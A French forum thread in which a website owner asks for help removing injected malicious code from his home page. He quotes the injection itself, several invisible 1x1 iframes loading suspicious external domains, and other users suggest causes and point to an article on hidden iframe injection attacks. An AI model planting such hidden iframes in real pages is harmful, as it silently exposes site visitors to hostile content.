Discussion :

[papisdoums]

Bonjour à tous,
à la fin du code html de la page d'accueil de mon site, s'est logé un code malicieux que je tente d'enlever depuis plusieurs jours mais en vain,
quand je transfere ma page sur mon disque local pour l'éditer le code malicieux reste invisible, quand je fais aussi Afficher/Editer sur la page via ftp le code est invisible,
alors qu'est ce que je dois faire pour me débarasser de ce virus et du coup sécuriser mon site pour de bon contre les intrusions, merci d'avance et voilà le code malicieux:

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

<iframe src="http://internetcountercheck.com/?click=17358343" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><iframe src="http://goooogleadsence.biz/?click=4FDE4A" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><iframe src="http://xtrarobotz.com/?click=E2007" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><iframe src="http://peskostruikaz.com/?click=31516D" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><iframe src="http://bukirda.com/?click=2C529E" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

[alband85]

Une page web ne peut pas contenir de virus (même si elle peut permettre d'en exécuter un, mais c'est un autre problème).

En l'occurrence, je pense que c'est ton hébergeur qui ajoute automatiquement ce cadre à toutes tes pages.
Suivant l'hébergement que tu utilises, c'est soit un comportement normal, soit ta machine qui s'est faite trouer.

[Invité]

Une page web ne peut pas contenir de virus (même si elle peut permettre d'en exécuter un, mais c'est un autre problème).

En l'occurrence, je pense que c'est ton hébergeur qui ajoute automatiquement ce cadre à toutes tes pages.
Suivant l'hébergement que tu utilises, c'est soit un comportement normal, soit ta machine qui s'est faite trouer.

Salut,

je doute fort qu'un l'hebergeur ajoute ce genre d'iframes avec des urls de ce style.

si tu recherches par exemple l'url peskstruikaz.com, tu as le résultat suivant

http://www.google.fr/search?hl=fr&q=...meta=&aq=f&oq=

Chez qui heberges-tu ton site? hebergement perso?

[alband85]

J'avoue ne pas avoir visité les liens.
Mais certains hébergeurs gratuits un peu "exotiques" ajoutent de la pub un peu invasive comme ça. Perso, un hébergeur me fait ça et j'en change

[papisdoums]

Merci de vos réponse,
cependant, j'ai bien effectué des recherche sur ce type de code qui s'est logé dans mon code source, il s'agit bien d'un code malicieux que mon hébergeur n'a pas installé pour faire de la pub, je ne suis pas hébergé gratuitement non plus, j'ai aussi contacté mon hébergeur qui semble dépassé par l'équation, ce que j'attends maintenant de ce forum c'est un moyen rapide et définitif de me débarasser de ce code

[alband85]

Ce que je n'arrive pas à voir, c'est d'où peut venir ton code "malicieux". Il nous manque trop d'informations... « Sur la page, il y est, mais quand on regarde, il n'y est pas. »

Comment tu es certain que c'est un code malicieux ? Quel est le résultat de tes recherches ? D'ailleurs, même, qu'est-ce que tu appelles « code malicieux » ?
Plus tu nous en dis, plus on a de chances de trouver.

À défaut, je n'ai pas mieux à te proposer que d'essayer d'approcher de l'ail et un miroir de l'écran pour voir ce qui se passe.

[papisdoums]

Pour comprendre le danger que peut représenter une iframe jettez un coup d'oeil sur cette page: http://www.cases.public.lu/fr/public...e_2/index.html

Je suis toujours à recherche de solutions pour ce code qui affecte ma page d'accueil, merci

[alband85]

Je suis tout à fait conscient des dangers que représente une iframe, mais tu ne réponds pas à mes questions.
Avec les informations que tu fournis, on ne peut absolument pas déterminer ce qui fait que cet iframe s'affiche et pourquoi elle s'affiche.

[Tchetch]

Premier résultat sur google en cherchant 'goooogleadsence.biz' : http://www.diovo.com/2009/03/hidden-...ction-attacks/

[papisdoums]

si je savais pourquoi cette iframe s'affiche et ce qui le fait afficher je ne poserais pas autant de questions à ce forum, en tout cas c'est un code que je n'ai ni installé ni donné l'autorisation à mon hébergeur d'installer, j'ai d'autres sites en ligne et c'est le seul où figure cette iframe, ce que je cherche c'est de me débarasser de ce code puisqu'il n'est ni de moi, ni de mon hébergeur, alors vous voyez un peu que jusque là vos réponses ne me tirent pas d'affaire du tout, je compte quand même sur vous pour trouver une solution, merci

[alband85]

jusque là vos réponses ne me tirent pas d'affaire du tout

Dans ce cas, réponds à nos questions et on te donnera peut-être des réponses... sans ça, on ne pourra rien te dire de plus.

Consulte le lien de Tchetch, il devrait t'en dire plus...

[Invité]

si je savais pourquoi cette iframe s'affiche et ce qui le fait afficher je ne poserais pas autant de questions à ce forum, en tout cas c'est un code que je n'ai ni installé ni donné l'autorisation à mon hébergeur d'installer, j'ai d'autres sites en ligne et c'est le seul où figure cette iframe, ce que je cherche c'est de me débarasser de ce code puisqu'il n'est ni de moi, ni de mon hébergeur, alors vous voyez un peu que jusque là vos réponses ne me tirent pas d'affaire du tout, je compte quand même sur vous pour trouver une solution, merci

Salut,

tu peux déjà lire le lien fourni par Tchetch et vérifier si la machine à partir de laquelle tu transferes ton site par ftp ne serait pas infectée par un worm/virus.

[papisdoums]

Merci Tchetch, le lien que vous indiquez m'a l'air trés pertinent, j'y vois déjà quelques réponses trés précises, merci à vous autres aussi qui avez essayer d'apporter des solutions à mon probleme, au cas échéant, je reviendrai à vous, bien des choses à tous